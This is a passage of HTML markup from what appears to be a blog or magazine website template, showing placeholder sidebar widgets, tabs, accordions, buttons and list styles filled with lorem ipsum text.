<!--</div>-->
</li>
<!--end sub menu level-1-->
<li class="searchbox">
<div id="sb-search" class="sb-search ">
<form>
<input class="sb-search-input " onkeyup="buttonUp();"
placeholder="Enter your search term..." onblur="monkey();"
type="search" value="" name="search" id="search">
<input class="sb-search-submit" type="submit" value="">
<span class="sb-icon-search"><i class="fa fa-search"></i></span>
</form>
</div>
</li>
</ul>
</aside>
<section class="main-section">
</section>
</div>
<!-- overlay contents here -->
<!-- /home-features & overlay contents end -->
<a class="exit-off-canvas"></a>
</div>
</div>
<!--end off-canvas-wrap-->
</div>
</div>
</section>
<!-- /main menu -->
</header>
<!--end header-->
<!--start main banner row-->
<div class="row">
<!--start column-->
<div class="small-12 medium-12 large-12 columns">
<!--start banner wrapper-->
<a href="#">
<div class="banner_wrapper">
<img src="images/banner_bg.jpg" class=""/>
<!--start team_magazine_text_wrapper-->
<div class="banner_title_subtitle">
<h1>
Main Banner Title Here
</h1>
<h5>
Banner Subtitle Here
</h5>
</div>
<!--end team_magazine_text_wrapper-->
</div>
<!--end banner wrapper-->
</a>
</div>
<!--end column-->
</div>
<!--end main banner row-->
<!--start manifold row-->
<div class="row">
<!--start first column-->
<div class="small-12 medium-6 large-4 columns">
<!--start email wrapper-->
<form>
<div class="email_wrapper box_shadow">
<div class="row collapse bg">
<div class="small-10 columns">
<input type="email" placeholder="Your email">
</div>
<div class="small-2 columns">
<a href="javascript:void(0)">
<span class="search fa fa-search "></span>
</a>
</div>
</div>
</div>
</form>
<!--end email wrapper-->
<!--start popular categories-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
Popular Categories
</h3>
<!--end title-->
<!--start categories-->
<div class="widget_cat ">
<ul>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Fashion</a>
</li>
<li>
<span class="origin_custom_item">
<span class="origin_custom_item_active"></span>
</span>
<a class="origin_custom_item_a_active" href="#">Business</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Web</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Space</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Food and Drinks</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Travel</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Science</a>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<a href="#">Lifestyle</a>
</li>
</ul>
</div>
<!--end categories-->
</div>
<!--end popular categories-->
<!--start popular tags-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
Popular Tags
</h3>
<!--end title-->
<!--starts tag-->
<div class="tag_list me">
<ul>
<li><a href="#">FASHION</a></li>
<li><a href="#">WEAR</a></li>
<li><a href="#">PHoto shoot</a></li>
<li><a href="#">Models</a></li>
<li><a href="#">Life Style</a></li>
<li><a href="#">WEAR</a></li>
<li><a href="#">FASHIon</a></li>
<li><a href="#">WEAR</a></li>
<li><a href="#">FASHIoN</a></li>
<li><a href="#">DEsigner</a></li>
<li><a href="#">Food</a></li>
<li><a href="#">News</a></li>
</ul>
</div>
<!--end tag-->
</div>
<!--end popular tags-->
<!--start text widget-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
Text Widget
</h3>
<!--end title-->
<!--start content wrapper-->
<div class="origin_common_content_wrapper txt_widget_content_wrapper">
<a href="#"><img src="images/txt_widget.png"/></a>
<!--start description-->
<p>
Nulla pretium vehicula libero, eu viverra leo pellentesque eu gravida eu scelerisq. Vestibulum ante
ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce semper vitae sem sed
efficitur. Nulla vestibulum eu odio sit amet ullamcorper.
</p>
<!--end description-->
<!--start social icon wrapper-->
<div class="txt_widget_social_icon_wrapper">
<a>
<i class="fa fa-facebook-f"></i>
</a>
<a href="javascript:void (0)">
<i class="fa fa-twitter"></i>
</a>
<a href="javascript:void (0)">
<i class="fa fa-google-plus"></i>
</a>
<a class="custom_active_text_widget_icon" href="javascript:void (0)">
<i class="fa fa-linkedin"></i>
</a>
<a href="javascript:void (0)">
<i class="fa fa-pinterest-p"></i>
</a>
<a href="javascript:void (0)">
<i class="fa fa-instagram"></i>
</a>
</div>
<!--end social icon wrapper-->
</div>
<!--end content wrapper-->
</div>
<!--end text widget-->
<!--start gallery wrapper-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
Gallery
</h3>
<!--end title-->
<div class="gallery">
<ul>
<li><a href="#"><img src="images/1.jpg"></a></li>
<li><a href="#"><img src="images/2.jpg"></a></li>
<li><a href="#"><img src="images/3.jpg"></a></li>
<li><a href="#"><img src="images/3.jpg"></a></li>
<li><a href="#"><img src="images/4.jpg"></a></li>
<li><a href="#"><img src="images/1.jpg"></a></li>
<li><a href="#"><img src="images/2.jpg"></a></li>
<li><a href="#"><img src="images/2.jpg"></a></li>
<li><a href="#"><img src="images/3.jpg"></a></li>
<li><a href="#"><img src="images/3.jpg"></a></li>
<li><a href="#"><img src="images/4.jpg"></a></li>
<li><a href="#"><img src="images/1.jpg"></a></li>
</ul>
</div>
</div>
<!--end gallery wrapper-->
</div>
<!--end first column-->
<!--start second column-->
<div class="small-12 medium-6 large-4 columns">
<!--start popular post-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
popular posts
</h3>
<!--end title-->
<!--start popular post content wrapper-->
<div class="popular_post_content_wrapper">
<!--start post list-->
<div class="post_list">
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">WOW! It`s incredible!!! Cras dictum tellus id risus finibus
luctus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">WOW! It`s incredible!!! Cras dictum tellus id risus finibus
luctus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">WOW! It`s incredible!!! Cras dictum tellus id risus finibus
luctus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"> <img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">WOW! It`s incredible!!! Cras dictum tellus id risus finibus
luctus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
</div>
<!--end post list-->
<!-- start popular post nav -->
<div class="event_nav text-center">
<span id="popular_post_left_arrow" class="left left_arrow"><a href="#">← </a></span>
<span id="popular_post_right_arrow" class="right right_arrow"><a href="">→</a></span>
</div>
<!--end popular post nav-->
</div>
<!--end popular post content wrapper-->
</div>
<!--end popular post-->
<!--start photo slider-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
photo slider
</h3>
<!--end title-->
<!--start photo slider content wrapper-->
<div class="photo_slider_content_wrapper">
<div class="widget_slider">
<ul class="carousel_sidebar">
<li><a href="#"><img src="images/1.jpg"/></a></li>
<li><a href="#"><img src="images/2.jpg"/></a></li>
<li><a href="#"><img src="images/3.jpg"/></a></li>
<li><a href="#"><img src="images/4.jpg"/></a></li>
</ul>
<div class="event_nav text-center">
<span class="left left_arrow" id="slider-next2"></span>
<span class="right right_arrow" id="slider-prev2"></span>
</div>
</div>
</div>
<!--end photo slider content wrapper-->
</div>
<!--end photo slider-->
<!--start dropdown widget-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
dropdown widget
</h3>
<!--end title-->
<!--start dropdown widget content wrapper-->
<div class="origin_common_content_wrapper dropdown_widget_content_wrapper">
<ul class="accordion" data-accordion>
<li class="accordion-navigation ">
<a href="#dropdown_widget_category_panel_content">Select Category
<span class="right"><i class="fa fa-chevron-down"></i><i
class="fa fa-chevron-up"></i></span>
</a>
<div id="dropdown_widget_category_panel_content" class="content ">
<ul>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Full Width</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Boxes</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Comby</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Left Side</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class="dropdown_widget_custom_active"></span>
</span>
<a href="javascript:void(0)">Right</a>
</li>
</ul>
</div>
</li>
<li class="accordion-navigation">
<a href="#dropdown_widget_deparment_panel_content">Select Department
<span class="right"><i class="fa fa-chevron-down"></i><i
class="fa fa-chevron-up"></i></span>
</a>
<div id="dropdown_widget_deparment_panel_content" class="content">
<ul>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Full Width</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class="dropdown_widget_custom_active"></span>
</span>
<a href="javascript:void(0)">Boxes</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Comby</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Left Side</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Right</a>
</li>
</ul>
</div>
</li>
<li class="accordion-navigation active">
<a href="#dropdown_widget_type_panel_content">Select Type
<span class="right"><i class="fa fa-chevron-down"></i><i
class="fa fa-chevron-up"></i></span>
</a>
<div id="dropdown_widget_type_panel_content" class="content active">
<ul>
<li>
<span class="drop_down_widget_active_portion">
<span class="dropdown_widget_custom_active"></span>
</span>
<a href="javascript:void(0)">Full Width</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Boxes</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Comby</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Left Side</a>
</li>
<li>
<span class="drop_down_widget_active_portion">
<span class=""></span>
</span>
<a href="javascript:void(0)">Right</a>
</li>
</ul>
</div>
</li>
</ul>
</div>
<!--end dropdown widget content wrapper-->
</div>
<!--end dropdown widget-->
<!--start tweets-->
<div class="origin_common_wrapper tweet_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
tweets
</h3>
<!--end title-->
<!--start tweets content-->
<div class="tweet_content_wrapper">
<!--start single tweets-->
<div class="single_tweets">
<!--start icon section-->
<div class="tweet_icon_wrapper">
<span class="fa fa-2x fa-twitter"></span>
</div>
<!--end icon section-->
<!--start description section-->
<div class="tweet_description_wrapper">
<span class="tweet_relative_time">16h ago</span>
<p>
<span class="tweeted_by">@doe</span>donec at diam pulvinar, rutrum urna in, tincidunt mi
</p>
</div>
<!--end description section-->
</div>
<!--end single tweets-->
<!--start single tweets-->
<div class="single_tweets">
<!--start icon section-->
<div class="tweet_icon_wrapper">
<span class="fa fa-2x fa-twitter"></span>
</div>
<!--end icon section-->
<!--start description section-->
<div class="tweet_description_wrapper">
<span class="tweet_relative_time">16h ago</span>
<p>
<span class="tweeted_by">@gambit</span>donec at diam pulvinar, rutrum urna in, tincidunt mi
</p>
</div>
<!--end description section-->
</div>
<!--end single tweets-->
<!--start single tweets-->
<div class="single_tweets">
<!--start icon section-->
<div class="tweet_icon_wrapper">
<span class="fa fa-2x fa-twitter"></span>
</div>
<!--end icon section-->
<!--start description section-->
<div class="tweet_description_wrapper">
<span class="tweet_relative_time">16h ago</span>
<p>
<span class="tweeted_by">@oman</span>donec at diam pulvinar, rutrum urna in, tincidunt mi
</p>
</div>
<!--end description section-->
</div>
<!--end single tweets-->
</div>
<!--end tweets content-->
</div>
<!--end tweets-->
</div>
<!--end second column-->
<!--start third column-->
<div class="small-12 medium-6 large-4 columns">
<!--start latest comment-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
latest comments
</h3>
<!--end title-->
<!--start latest comments content wrapper-->
<div class="origin_common_content_wrapper">
<div class="commnet_list">
<div class="single_comment">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="title_middle">
<p class="dat_time"> 18: 35 Jan. 22. 2015 </p>
<p class="comment_meta">
by <span class="author">K.J. Kent</span> on <span
class="cat">Nulla pretium vehicula libero</span>
</p>
</div>
<div class="desc">
WOW! It`s incredible!!! Cras dictum tellus id risus finibus luctus
</div>
</div>
<div class="single_comment">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="title_middle">
<p class="dat_time"> 18: 35 Jan. 22. 2015 </p>
<p class="comment_meta">
by <span class="author">K.J. Kent</span> on <span
class="cat">Nulla pretium vehicula libero</span>
</p>
</div>
<div class="desc">
WOW! It`s incredible!!! Cras dictum tellus id risus finibus luctus
</div>
</div>
<div class="single_comment">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="title_middle">
<p class="dat_time"> 18: 35 Jan. 22. 2015 </p>
<p class="comment_meta">
by <span class="author">K.J. Kent</span> on <span
class="cat">Nulla pretium vehicula libero</span>
</p>
</div>
<div class="desc">
WOW! It`s incredible!!! Cras dictum tellus id risus finibus luctus
</div>
</div>
</div>
</div>
<!--end latest comments content wrapper-->
</div>
<!--end latest comment-->
<!--start social Media-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
social media
</h3>
<!--end title-->
<!--start social media content wrapper-->
<div class="origin_common_content_wrapper">
<!--start fb-->
<div class="fb_wrapper">
<a href="#">
<i class="social_icon fa fa-facebook-f"></i>
<span class="number_counter">128,859</span>
<span>likes</span>
</a>
</div>
<!--end fb-->
<!--start twitter-->
<div class="twitter_wrapper">
<a href="#">
<i class="social_icon fa fa-twitter"></i>
<span class="number_counter">31,045</span>
<span>followers</span>
</a>
</div>
<!--end twitter-->
<!--start pinterest-->
<div class="pinterest_wrapper">
<a href="#">
<i class="social_icon fa fa-pinterest"></i>
<span class="number_counter">290,003</span>
<span>pins</span>
</a>
</div>
<!--end pinterest-->
<!--start google plus-->
<div class="google_plus_wrapper">
<a href="#">
<i class="social_icon fa fa-google-plus"></i>
<span class="number_counter">290,003</span>
<span>followers</span>
</a>
</div>
<!--end google plus-->
<!--start subscribers-->
<div class="subscriber_wrapper">
<a href="#">
<i class="social_icon fa fa-rss"></i>
<span class="number_counter">290,003</span>
<span>subscribers</span>
</a>
</div>
<!--end subscriber-->
</div>
<!--end social media content wrapper-->
</div>
<!--end social Media-->
<!--start popular & new tabs-->
<div class="origin_common_wrapper popular_new_tab box_shadow">
<!--start popular & new content wrapper-->
<div class="origin_common_content_wrapper ">
<ul class="tabs" data-tab role="tablist">
<li class="tab-title active" role="presentational"><a href="#panel2-1" role="tab" tabindex="0"
aria-selected="true"
controls="panel2-1">Popular</a>
</li>
<li class="tab-title" role="presentational"><a href="#panel2-2" role="tab" tabindex="0"
aria-selected="false" controls="panel2-2">New</a></li>
</ul>
<div class="tabs-content">
<!--start popular content-->
<section role="tabpanel" aria-hidden="false" class="content active" id="panel2-1">
<div class="post_list">
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
</div>
</section>
<!--end popular content-->
<!--start new content-->
<section role="tabpanel" aria-hidden="true" class="content" id="panel2-2">
<div class="post_list">
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/man_1.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/man_8.jpg"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/man_2.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/man_4.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
</div>
</section>
<!--end new content-->
</div>
</div>
<!--end popular & new content wrapper-->
</div>
<!--end popular & new tabs-->
<!--start popular categories v2-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
popular categories v2
</h3>
<!--end title-->
<!--start popular categories v2 content wrapper-->
<div class="popular_cate_v2_content_wrapper">
<div class="widget_cat">
<ul>
<li class="">
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon">
<img src="images/icons/fashion.png">
</span>
<a href="#">Fashion</a>
<span class="popular_cate2_number">10</span>
</li>
<li class="origin_custom_item_a_active">
<span class="origin_custom_item">
<span class="origin_custom_item_active"></span>
</span>
<span class="popular_cate2_icon fa fa-bell"></span>
<a class="origin_custom_item_a_active" href="#">Business</a>
<span class="popular_cate2_number">18</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon fa fa-heart"></span>
<a href="#">Web</a>
<span class="popular_cate2_number">100</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon fa fa-camera"></span>
<a href="#">Space</a>
<span class="popular_cate2_number">580</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon ">
<img src="images/icons/food_drinks.png">
</span>
<a href="#">Food and Drinks</a>
<span class="popular_cate2_number">50</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon">
<img src="images/icons/travel.png">
</span>
<a href="#">Travel</a>
<span class="popular_cate2_number">208</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon fa fa-leaf"></span>
<a href="#">Science</a>
<span class="popular_cate2_number">110</span>
</li>
<li>
<span class="origin_custom_item ">
<span class=""></span>
</span>
<span class="popular_cate2_icon">
<img src="images/icons/lifestyle.png">
</span>
<a href="#">Lifestyle</a>
<span class="popular_cate2_number">105</span>
</li>
</ul>
</div>
</div>
<!--end popular categories v2 content wrapper-->
</div>
<!--end popular categories v2-->
</div>
<!--end third column-->
</div>
<!--end manifold row-->
<!--start tab and accordion style row-->
<div class="row">
<!--start tab style column-->
<div class="small-12 medium-6 large-6 columns">
<!--start tab style-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
tab style
</h3>
<!--end title-->
<!--start latest comments content wrapper-->
<div class="origin_common_content_wrapper tab_style_content_wrapper">
<ul class="tabs" data-tab role="tablist">
<li class="tab-title active" role="presentational"><a href="#panel2-3" role="tab" tabindex="0"
aria-selected="true"
controls="panel2-3">Popular</a>
</li>
<li class="tab-title" role="presentational"><a href="#panel2-4" role="tab" tabindex="0"
aria-selected="false" controls="panel2-4">New</a>
</li>
</ul>
<div class="tabs-content">
<!--start popular content-->
<section role="tabpanel" aria-hidden="false" class="content active" id="panel2-3">
<!--start row-->
<div class="row">
<!--start col 6-->
<div class="small-12 medium-5 large-5 columns">
<!--start title-->
<h5>
Nulla vel blandit dolor.
</h5>
<!--end title-->
<!--start img-->
<div class="tab_style_img_wrapper">
<a href="#"><img src="images/1.jpg"/></a>
</div>
<!--end img-->
</div>
<!--end col 6-->
<!--start col 6-->
<div class="small-12 medium-7 large-7 columns">
<p>
Nunc rhoncus ultrices tellus, sit amet aliquam sapien. In ut dolor aliquam, blandit
augue ac, commodo arcu. Fusce et libero dapibus, dictum libero ut, vehicula nunc. Ut
rhoncus, arcu sit amet mattis iaculis, risus leo posuere urna, a ullamcorper est
odio
non urna. Donec in ultrices leo. Curabitur consequat ac justo id pretium. In
lobortis
ligula ac tellus arcu ac accumsan.
</p>
</div>
<!--end col 6-->
</div>
<!--end row-->
</section>
<!--end popular content-->
<!--start new tab style content-->
<section role="tabpanel" aria-hidden="true" class="content" id="panel2-4">
<!--start row-->
<div class="row">
<!--start col 6-->
<div class="small-12 medium-5 large-5 columns">
<!--start title-->
<h5>
Rashid Al Asif
</h5>
<!--end title-->
<!--start img-->
<div class="tab_style_img_wrapper">
<a href="#"><img src="images/2.jpg"/></a>
</div>
<!--end img-->
</div>
<!--end col 6-->
<!--start col 6-->
<div class="small-12 medium-7 large-7 columns">
<p>
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.
Donec at dui mollis, ultrices lectus ut, tempus eros. Nunc rhoncus ultrices tellus,
sit amet aliquam sapien. In ut dolor aliquam, blandit augue ac, commodo arcu. Fusce
et libero dapibus, dictum libero ut, vehicula nunc. Ut rhoncus, arcu sit amet mattis
iaculis, risus leo posuere urna,
</p>
</div>
<!--end col 6-->
</div>
<!--end row-->
</section>
<!--end new tab style content-->
</div>
</div>
<!--end latest comments content wrapper-->
</div>
<!--end tab style-->
</div>
<!--end tab style column-->
<!--start accordion style column-->
<div class="small-12 medium-6 large-6 columns">
<!--start accordion style-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
accordion style
</h3>
<!--end title-->
<!--start accordion style content wrapper-->
<div class="origin_common_content_wrapper accordion_style_content_wrapper">
<ul class="accordion" data-accordion>
<li class="accordion-navigation ">
<a href="#category_panel_content">Select Category
<span class="right"><i class="fa fa-chevron-down"></i><i
class="fa fa-chevron-up"></i></span>
</a>
<div id="category_panel_content" class="content">
<p>
Panel 1. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
</p>
</div>
</li>
<li class="accordion-navigation active">
<a href="#department_panel_content">Select Department
<span class="right"><i class="fa fa-chevron-down"></i><i
class="fa fa-chevron-up"></i></span>
</a>
<div id="department_panel_content" class="content active">
<p>
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia. Donec
at
dui mollis, ultrices lectus ut, tempus eros. Nunc rhoncus ultrices tellus, sit amet
aliquam
sapien. In ut dolor aliquam, blandit augue ac, commodo arcu. Fusce et libero dapibus,
dictum
libero ut, vehicula nunc. Ut rhoncus, arcu sit amet mattis iaculis, risus leo posuere
urna,
a ullamcorper est odio non urna. Donec in ultrices leo. Curabitur consequat ac justo id
pretium. In lobortis ligula ac tellus arcu ac accumsan. Ut rhoncus, arcu sit amet
mattis.
</p>
</div>
</li>
</ul>
</div>
<!--end accordion style content wrapper-->
</div>
<!--end accordion style-->
</div>
<!--end accordion style column-->
</div>
<!--end tab and accordion style row-->
<!--start navigation style row-->
<div class="row">
<!--start navigation column-->
<div class="small-12 medium-12 large-12 columns">
<!--start navigation style-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
navigation
</h3>
<!--end title-->
<!--start navigation style content wrapper-->
<div class="origin_common_content_wrapper nav_styles">
<ul class="inline-list">
<!-- big button nav -->
<li class="nav_style_red padding_left_right_arrow">
<a href="#" class="button alert white redbg"><i class="fa fa-chevron-left"></i></a>
<a href="#" class="button alert white redbg"><i class="fa fa-chevron-right"></i></a>
</li>
<li class="nav_style_black padding_left_right_arrow">
<a href="#" class="button default white blackbg"><i class="fa fa-chevron-left"></i></a>
<a href="#" class="button default white blackbg"><i class="fa fa-chevron-right"></i></a>
</li>
<li class="nav_style_offw padding_left_right_arrow">
<a href="#" class="button info offwbg offw"><i class="fa fa-chevron-left"></i></a>
<a href="#" class="button info offwbg offw"><i class="fa fa-chevron-right"></i></a>
</li>
<!-- small nav button -->
<li class="small_arrow_wrapper">
<a href="#" class="small_arrow_1 red border_bot_red">←</a>
<a href="#" class="small_arrow_1 red border_bot_red">→</a>
</li>
<li class="small_arrow_wrapper">
<a href="#" class="small_arrow_1 black border_bot_black">←</a>
<a href="#" class="small_arrow_1 black border_bot_black">→</a>
</li>
<!-- pager -->
<li class="pager">
<a href="" data-slide-index="0" class="pager_link active">1</a>
<a href="" data-slide-index="0" class="pager_link">2</a>
<a href="" data-slide-index="0" class="pager_link">3</a>
<a href="" data-slide-index="0" class="pager_link">4</a>
</li>
<!-- call to action small text -->
<li class="">
<a href="#" class="small_arrow_2 red border_bot_red">CALL TO ACTION →</a>
</li>
<li class="">
<a href="#" class=" small_arrow_2 black border_bot_red">CALL TO ACTION →</a>
</li>
<li class="">
<a href="#" class="small_arrow_2 black border_bot_black">CALL TO ACTION →</a>
</li>
</ul>
<ul class="inline-list">
<!-- big button nav call to actions -->
<li class="nav_style_red padding_left_right_arrow_1">
<a href="#" class="button alert white redbg_1 padding_left_right_arrow_1">CALL TO ACTION</a>
</li>
<li class="nav_style_black padding_left_right_arrow_1">
<a href="#" class="button default white blackbg_1 ">CALL TO ACTION</a>
</li>
<li class="nav_style_offw padding_left_right_arrow_1">
<a href="#" id="normal_new"
class="button info offwbg offw padding_left_right_arrow_1 normal_new">CALL TO ACTION</a>
</li>
<li class="nav_style_offw padding_left_right_arrow_1">
<a href="#" class="button info whitebg border_red red">CALL TO ACTION</a>
</li>
<li class="nav_style_red padding_left_right_arrow_1">
<a href="#" class="button alert white redbg_1 ">
<img src="images/pencil.png"/>
CALL TO ACTION
</a>
</li>
<li class="nav_style_black padding_left_right_arrow_1">
<a href="#" class="button default white blackbg_1">
<img src="images/pencil.png"/>
CALL TO ACTION
</a>
</li>
</ul>
<ul class="inline-list">
<!-- big button nav call to actions -->
<li class="nav_style_red padding_left_right_arrow_3">
<a href="#" class="button alert white redbg_1 medium">CALL TO ACTION</a>
</li>
<li class="nav_style_black padding_left_right_arrow_3">
<a href="#" class="button default white blackbg_1 medium">CALL TO ACTION</a>
</li>
<li class="nav_style_offw padding_left_right_arrow_3">
<a href="#" class="button info offwbg offw medium">CALL TO ACTION</a>
</li>
<li class="nav_style_offw padding_left_right_arrow_4">
<a href="#" class="button info whitebg border_red red medium">CALL TO ACTION</a>
</li>
<li class="nav_style_red padding_left_right_arrow_4">
<a href="#" class="button alert white redbg_1 ">
<img src="images/pencil.png"/>
CALL TO ACTION
</a>
</li>
<li class="nav_style_black padding_left_right_arrow_4">
<a href="#" class="button alert white blackbg_1 ">
<img src="images/pencil.png"/>
CALL TO ACTION
</a>
</li>
</ul>
<ul class="inline-list">
<li class="small_arrow">
<input class="css-checkbox" id="prodetails_chk" type="checkbox">
<label class="css-label" name="demo_lbl_1" for="prodetails_chk"></label>
<input class="css-checkbox" id="prodetails_chk2" type="checkbox" checked>
<label class="css-label" name="demo_lbl_2" for="prodetails_chk2"></label>
</li>
<li class="small_arrow">
<input type="radio" id="r1" name="rr"/>
<label for="r1"><span></span></label>
<input type="radio" id="r2" name="rr" checked/>
<label for="r2"><span></span></label>
</li>
</ul>
</div>
<!--end navigation style content wrapper-->
</div>
<!--end navigation style-->
</div>
<!--end navigation column-->
</div>
<!--end navigation style row-->
<!--start list style row-->
<div class="row">
<!--start 12 cols-->
<div class="small-12 medium-12 large-12 columns">
<!--start list style-->
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
list style
</h3>
<!--end title-->
<!--start list style content wrapper -->
<div class="origin_common_content_wrapper">
<!--start inner row-->
<div class="row">
<!--start first column-->
<div class="small-12 medium-6 large-3 columns">
<!--start first list style wrapper-->
<div class="first_list_style_wrapper">
<ul>
<li><span>Aliquam congue nec velit vitae</span></li>
<li><span>integer auctor lobortis pellentesque.</span></li>
<li><span>Aenean et nibh mattis, porttitor</span></li>
<li><span>Sed eleifend faucibus metus</span></li>
</ul>
</div>
<!--end first list style wrapper-->
</div>
<!--end first column-->
<!--start second column-->
<div class="small-12 medium-6 large-3 columns">
<!--start second list style wrapper-->
<div class="second_list_style_wrapper">
<ul>
<li>
<label class="label">1</label>
<span>Aliquam congue nec velit vitae</span>
</li>
<li>
<label class="label">2</label>
<span>integer auctor lobortis pellentesque.</span>
</li>
<li>
<label class="label">3</label>
<span>Aenean et nibh mattis, porttitor</span>
</li>
<li>
<label class="label">4</label>
